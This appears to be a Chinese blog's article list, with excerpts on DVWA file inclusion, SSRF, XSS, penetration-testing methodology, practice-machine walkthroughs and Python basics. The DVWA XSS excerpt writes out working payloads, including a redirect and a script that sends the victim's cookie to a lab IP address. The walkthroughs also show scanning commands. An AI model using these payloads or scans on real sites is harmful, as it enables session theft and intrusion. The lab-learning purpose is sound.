- 博客(10)
- 收藏
- 关注
RSS订阅原创 DVWA之文件包含
Windows本地文件包含低查看源码不存在过滤,可直接读取或执行文件内容中源码中存在一些过滤规则,我们只需要进行复写或者大小写转换即可绕过1、使用绝对路径2、使用相对路径复写或者是大小写绕过高要求文件变量以file开头,因此远程文件包含失效,只能使用本地文件包含,且需要用到file协议Linux低中因为源码里过滤的是http和https,因此不影响我们使用相对路径和绝对路径远程文件包含低Shell.php内容攻击者访问受害者shell.php文件
2021-12-03 19:57:03
3117
原创 CSRF简介
SSRF原理图:黑客通过存在是ssrf漏洞的外网服务器,可以成功访问到内网服务器。分类:Basic ssrf:返回攻击者发送请求的响应,当攻击者发送一个需要访问的 url 给被攻击服务器后,会将 url 服务器的响应内容返回给攻击者。Blind ssrf:不会返回url服务器的响应内容给攻击者,只有状态码,因此blind ssrf通常可用来做内网的主机探测Ssrf常用协议:file:读取本地文件Gopher:是一种分布式文档传递服务Dict:这种URL Scheme能够引用允许通过DI
2021-12-03 19:52:36
3717
原创 DOM型XSS 和存储型XSS
存储型原理图及原理弹窗:原理:1、攻击者向服务器提交一段js代码2、服务器保存js代码并将结果返回给攻击者3、受害者访问服务器4、服务器将js代码传给受害者,受害者电脑出现弹窗Cookie:原理:1、攻击者向服务器提交一段js代码2、服务器保存js代码并将结果返回给攻击者3、受害者访问服务器4、服务器将js代码传给受害者5、受害者电脑将cookie值发送给攻击者重定向:原理:1、攻击者向服务器提交一段js代码2、服务器保存js代码并将结果返回给攻击者3、受害者访问服务器
2021-12-03 19:51:39
348
原创 DVWA XSS
低弹窗:<script>alert('xss')</script> <a href=’’ onclick=alert(‘你是傻子吧!’)>美女图片</a>重定向:<script>window.location="http://www.4399.com"</script>点击forward跳转下一界面Cookie:<script>new Image().src=”http://192.168.116.1
2021-12-03 19:48:27
184
原创 渗透测试思路
信息收集服务器的相关信息(真实ip,系统类型,版本,开放端口,WAF等)网站指纹识别(包括,cms,cdn,证书等),dns记录whois信息,姓名,备案,邮箱,电话反查(邮箱丢社工库,社工准备等)子域名收集,旁站,C段等google hacking针对化搜索,pdf文件,中间件版本,弱口令扫描等扫描网站目录结构,爆后台,网站banner,测试文件,备份等敏感文件泄漏等传输协议,通用漏洞,exp,github源码等漏洞挖掘浏览网站,看看网站规模,功能,特点等端口,弱口令,目录等扫描,对响
2021-10-20 18:20:48
2015
原创 zico2靶机渗透测试过程
1、收集ip(netdiscover)netdiscover -i eth0 -r 192.168.116.0/24-i:选择网卡 -r:选择网段.1是物理机ip;.2是网关ip;.254是边界ip;.169是目的主机ip2、收集开放端口(masscan)masscan --rate 10000 --ports 0-65535 192.168.116.169–rate:发包速率 --ports:选择扫描端口3、收集开放端口对应的服务nmap -p 80,22,111,59266 192.
2021-10-20 18:16:18
1453
原创 billu靶机渗透测试过程
一、主机探测我们可以推断出目标主机ip为192.168.159.135二、端口扫描发现有开启80和22端口三、扫描端口开放的服务四、扫描版本和系统信息五、用dirb扫描80端口目录六、用浏览器打开全部链接发现可以利用的有其中在phpinfo()中发现开启了本地文件包含,关闭了远程文件包含七、判断如何进一步获取shell这个地方主要是登录框,提示存在sql注入。试了一段时间发现进不去,我们在目录扫描时发现了index.php这个文件,看看里面有啥。但是想查看文件我们得找到
2021-10-20 18:04:11
2350
原创 python异常处理
一、异常处理有什么用?当我们在运行程序时,在某一处地方因为出现报错导致程序终止,这是让我们很头疼的事情,因此可以用异常处理让程序不受干扰继续运行下去。二、基本语法try:可能出现异常的代码块except:出现异常后的处理else:没异常时执行的代码块finally:有无异常都执行的代码块2.实例分析代码如下(示例):try: a=int(input('输入一个整数:')) print(a)except ValueError as e: print(e)
2021-05-04 17:24:16
59
原创 PYTHON学习之字典
一、字典是什么?字典是另一种可变容器模型,且可存储任意类型对象。字典内容包括键和值,也就是键值对。整个字典在{}内,即:d = {key1 : value1, key2 : value2, key3 : value3 }二、创建字典代码如下(示例):dict={'key1':'value1','key2':'value2'}#这是创建有内容字典dict={}#这是创建一个空字典三、字典使用1.访问字典里的内容代码如下(示例):dict = {'Name': 'Runoob', 'Age
2021-04-24 21:51:36
118
1
原创 PYTHON循环上课笔记
python循环条件分支if语句if elif语句for循环while循环9x9乘法表实现if语句和其他编程语言一样,if语句代表条件判断。如:if 条件: 条件为真执行的语句 else: 条件为假执行的语句if elif语句当发现判断条件增多后if语句无法满足我们的需求时,可以使用if elif语句。和c语言的区别,python中是if elif else 而不是 if else。如:if 条件1:执行代码块1elif 条件2:执行代码块2else
2021-04-17 20:44:47
227
1
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人